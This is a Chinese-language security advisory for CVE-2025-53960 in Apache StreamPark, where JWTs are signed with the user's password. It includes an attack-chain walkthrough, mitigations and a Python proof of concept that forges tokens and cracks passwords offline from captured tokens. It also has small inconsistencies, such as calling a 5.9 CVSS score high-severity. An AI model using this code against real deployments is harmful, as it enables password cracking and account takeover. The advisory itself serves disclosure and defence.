CVE-2025-53960 Apache StreamPark JWT签名密钥使用用户密码漏洞

漏洞信息

漏洞编号

CVE-2025-53960

漏洞类型

弱密钥/认证绕过

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache StreamPark

漏洞概述

CVE-2025-53960是Apache StreamPark中的一个高危安全漏洞。该漏洞源于JWT（JSON Web Token）签发过程中的密钥管理缺陷。在Apache StreamPark 2.0.0至2.1.7之前的版本中，系统在生成JWT令牌时直接使用用户的密码作为HMAC签名密钥，例如HS256算法。这意味着攻击者如果能够获取到有效的JWT令牌，就可以通过离线暴力破解的方式尝试恢复用户密码。更为严重的是，如果攻击者已经知晓用户的密码，便可以伪造任意有效的身份令牌，从而冒充该用户进行操作，最终可能导致完整的账户接管。CVSS评分5.9（MEDIUM），攻击复杂度高但无需认证和用户交互，机密性影响为高。该漏洞于2025年12月12日披露，建议用户立即升级到2.1.7版本以修复此问题。

技术细节

Apache StreamPark在实现JWT认证机制时存在严重的设计缺陷。系统使用用户密码作为HMAC-SHA256算法的签名密钥来生成访问令牌。当用户登录系统时，服务器使用其密码对JWT进行签名，然后将此令牌返回给客户端。由于密码被直接用作密钥，攻击者可以通过以下两种方式利用此漏洞：

1. **离线密码破解攻击**：攻击者获取到目标用户的JWT令牌后，可以在本地使用字典攻击或暴力破解方法尝试恢复用户密码。JWT令牌的header部分通常会明确声明使用的算法（如HS256），攻击者可以提取已签名的payload，然后使用候选密码进行签名尝试，比对结果是否匹配。

2. **令牌伪造攻击**：一旦攻击者通过社会工程学、数据泄露或其他途径获取了用户的明文密码，就可以使用该密码作为密钥伪造有效的JWT令牌，从而绕过正常的认证流程，以受害者身份访问系统资源。

此漏洞的根本原因在于将用户可变的凭证（密码）用作签名密钥的设计错误。正确的做法应该是使用服务器端存储的秘密密钥或非对称加密算法（如RS256）来签发JWT。

攻击链分析

STEP 1

步骤1

攻击者通过中间人攻击、网络嗅探或日志泄露等途径获取目标用户的有效JWT令牌

STEP 2

步骤2

攻击者从JWT header中识别出使用的是HS256算法（使用密码作为HMAC密钥）

STEP 3

步骤3

攻击者使用获取的JWT令牌进行离线暴力破解，尝试常见密码或字典中的密码对令牌payload进行签名验证

STEP 4

步骤4

如果密码破解成功，攻击者获得用户明文密码，或直接使用该密码伪造新的JWT令牌

STEP 5

步骤5

攻击者使用伪造的JWT令牌向Apache StreamPark服务器发起认证请求，成功冒充受害者账户

STEP 6

步骤6

攻击者在目标账户中执行未授权操作，包括数据窃取、权限提升或持久化控制，最终实现完全账户接管

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-53960 PoC - Apache StreamPark JWT Password Brute Force
This PoC demonstrates offline password brute force attack against JWT tokens
signed with user's password as HMAC key.
"""

import hashlib
import hmac
import base64
import json
import itertools
import string
from typing import Optional

def base64url_decode(data: str) -> bytes:
    """Decode base64url encoded string"""
    padding = 4 - len(data) % 4
    if padding != 4:
        data += '=' * padding
    return base64.urlsafe_b64decode(data)

def base64url_encode(data: bytes) -> str:
    """Encode bytes to base64url string"""
    return base64.urlsafe_b64encode(data).rstrip(b'=').decode('ascii')

def sign_payload(secret: str, header: dict, payload: dict) -> str:
    """Create HMAC-SHA256 signature using password as key"""
    header_b64 = base64url_encode(json.dumps(header, separators=(',', ':')).encode())
    payload_b64 = base64url_encode(json.dumps(payload, separators=(',', ':')).encode())
    message = f"{header_b64}.{payload_b64}".encode()
    signature = hmac.new(secret.encode(), message, hashlib.sha256).digest()
    return base64url_encode(signature)

def forge_jwt(username: str, password: str, claims: dict = None) -> str:
    """
    Forge a valid JWT token if password is known
    """
    header = {"alg": "HS256", "typ": "JWT"}
    payload = claims or {
        "sub": username,
        "iat": 1733961600,
        "exp": 1734048000,
        "iss": "Apache StreamPark"
    }
    
    signature = sign_payload(password, header, payload)
    header_b64 = base64url_encode(json.dumps(header, separators=(',', ':')).encode())
    payload_b64 = base64url_encode(json.dumps(payload, separators=(',', ':')).encode())
    
    return f"{header_b64}.{payload_b64}.{signature}"

def brute_force_jwt(jwt_token: str, wordlist: list = None) -> Optional[str]:
    """
    Attempt to brute force the password used to sign a JWT token
    """
    parts = jwt_token.split('.')
    if len(parts) != 3:
        raise ValueError("Invalid JWT format")
    
    header_b64, payload_b64, signature_b64 = parts
    message = f"{header_b64}.{payload_b64}".encode()
    target_signature = base64url_decode(signature_b64)
    
    # Default wordlist for demonstration
    if wordlist is None:
        wordlist = ['admin', 'password', '123456', 'stream', 'spark', 'park']
    
    for password in wordlist:
        computed_sig = hmac.new(password.encode(), message, hashlib.sha256).digest()
        if hmac.compare_digest(computed_sig, target_signature):
            print(f"[+] Password found: {password}")
            return password
    
    return None

def main():
    print("CVE-2025-53960 - Apache StreamPark JWT Password Attack PoC")
    print("=" * 60)
    
    # Example JWT token (replace with actual captured token)
    example_jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsIm5iZiI6MTczMzk2MTYwMCwiZXhwIjoxNzM0MDQ4MDAwLCJpc3MiOiJBcGFjaGUgU3RyZWFtUGFyayJ9.signature_here"
    
    # Demonstrate token forgery if password is known
    print("\n[1] Token Forgery Demo:")
    forged_token = forge_jwt("admin", "admin123")
    print(f"Forged token: {forged_token}")
    
    # Demonstrate password brute force
    print("\n[2] Password Brute Force Demo:")
    found_password = brute_force_jwt(example_jwt)
    if found_password:
        print(f"Successfully cracked password: {found_password}")

if __name__ == "__main__":
    main()

影响范围

Apache StreamPark >= 2.0.0, < 2.1.7

防御指南

临时缓解措施

在等待官方修复期间，建议采取以下临时缓解措施：1）限制JWT令牌的传输和存储，实施HTTPS加密传输；2）启用应用层防火墙规则检测异常的JWT验证失败请求；3）实施账户锁定策略防止暴力破解；4）监控认证日志，及时发现可疑活动；5）考虑暂时禁用JWT认证方式，使用传统的会话认证机制替代；6）增强网络隔离，限制对认证接口的访问来源。